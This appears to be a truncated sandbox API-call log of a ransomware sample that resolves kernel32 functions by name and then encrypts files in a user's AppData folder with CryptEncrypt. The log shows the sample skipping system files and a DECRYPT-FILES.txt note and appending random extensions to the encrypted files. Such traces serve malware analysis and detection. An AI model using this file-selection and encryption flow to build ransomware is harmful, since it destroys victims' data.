16 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.583] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.583] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.583] lstrlenA (lpString="DELETEATOM") returned 10 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.583] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.583] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.583] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.583] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.583] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.583] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.583] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.583] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.583] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.583] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.584] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.584] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.584] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.584] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.584] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.584] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.584] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.584] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.584] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.584] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.584] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.584] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.584] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.584] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.584] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.584] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.584] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.584] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.584] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.585] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.585] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.585] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.585] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.585] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.585] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.585] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.585] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.585] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.585] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.585] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.585] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.585] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.585] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.585] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp") returned 55 [0082.586] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp.bAK8IZU") returned 63 [0082.586] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\whemr.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp.bAK8IZU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\whemr.bmp.bak8izu"), dwFlags=0x0) returned 1 [0082.586] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.586] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.587] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.587] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbaa540b0, ftCreationTime.dwHighDateTime=0x1d4cd10, ftLastAccessTime.dwLowDateTime=0x9fce6c00, ftLastAccessTime.dwHighDateTime=0x1d4c755, ftLastWriteTime.dwLowDateTime=0x9fce6c00, ftLastWriteTime.dwHighDateTime=0x1d4c755, nFileSizeHigh=0x0, nFileSizeLow=0x1752, dwReserved0=0x0, dwReserved1=0x0, cFileName="XG1ODMqHamQ.gif", cAlternateFileName="XG1ODM~1.GIF")) returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="DECRYPT-FILES.txt") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="autorun.inf") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="boot.ini") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="desktop.ini") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="ntuser.dat") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="iconcache.db") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="bootsect.bak") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="ntuser.dat.log") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="thumbs.db") returned 1 [0082.587] lstrcmpiW (lpString1="XG1ODMqHamQ.gif", lpString2="Bootfont.bin") returned 1 [0082.587] lstrlenW (lpString="XG1ODMqHamQ.gif") returned 15 [0082.587] lstrcmpiW (lpString1="gif", lpString2="lnk") returned -1 [0082.587] lstrcmpiW (lpString1="gif", lpString2="exe") returned 1 [0082.587] lstrcmpiW (lpString1="gif", lpString2="sys") returned -1 [0082.587] lstrcmpiW (lpString1="gif", lpString2="dll") returned 1 [0082.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.587] lstrlenW (lpString="XG1ODMqHamQ.gif") returned 15 [0082.587] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.587] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="XG1ODMqHamQ.gif" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif" [0082.587] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.588] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XG1ODMqHamQ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xg1odmqhamq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.588] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=5970) returned 1 [0082.588] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.588] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.588] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.588] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.588] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.588] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.589] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.589] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.589] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.590] CloseHandle (hObject=0x444) returned 1 [0082.590] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.590] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.590] CloseHandle (hObject=0x0) returned 0 [0082.590] CloseHandle (hObject=0x440) returned 1 [0082.590] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.591] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.591] GetTickCount () returned 0x114d1f0 [0082.591] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.591] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.591] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.591] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.592] lstrlenA (lpString="kernel32.dll") returned 12 [0082.592] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.592] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.592] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.592] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.592] lstrlenA (lpString="ADDATOMA") returned 8 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.592] lstrlenA (lpString="ADDATOMW") returned 8 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.592] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.592] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.592] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.592] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.592] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.592] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.592] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.592] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.593] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.593] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.593] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.593] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.593] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.593] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.593] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.593] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.593] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.593] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.593] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.593] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.593] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.593] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.593] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.593] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.593] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.593] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.593] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.594] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.594] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.594] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.594] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.594] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.594] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.594] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.594] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.594] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.594] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.594] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.594] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.594] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.594] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.594] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.594] lstrcpyA (in: 